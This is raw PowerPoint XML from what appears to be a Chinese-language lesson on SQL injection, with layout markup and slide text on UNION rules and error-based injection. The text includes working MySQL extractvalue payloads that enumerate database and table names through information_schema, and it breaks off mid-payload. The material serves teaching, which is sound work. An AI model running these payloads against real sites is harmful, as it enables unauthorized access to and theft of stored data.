            <a:ext cx="6526017" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>能查询字符串的最大长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3634367411"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774635" y="1215274"/>
            <a:ext cx="5008844" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>报错注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8422181-1A76-49EC-95FF-66ED3E48E1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001347" y="1198102"/>
            <a:ext cx="7496847" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select * from user where username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0D2E5E-462B-4623-9127-076EBD6409B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390021" y="2997179"/>
            <a:ext cx="3046547" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>爆数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDEEAB75-3008-4ED2-B892-F993936935C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408659" y="3392281"/>
            <a:ext cx="11641625" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> ' and(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(1,concat('~',(select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>                                                                 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>)))) #</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86522897-3C7E-4370-9C01-DDBD4987D7F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391775" y="4467013"/>
            <a:ext cx="12889008" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> ' and(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(1,concat('~',(select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>                          from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>='xxx')))) #</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CE0771-801F-4917-8CDA-5EAF7F65BC14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425606" y="4115556"/>
            <a:ext cx="1287217" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>爆表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4085A5-1EFA-48EA-B83B-663BC9F83052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466507" y="5552699"/>
            <a:ext cx="12168039" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> ' and(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(1,concat('~',(select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
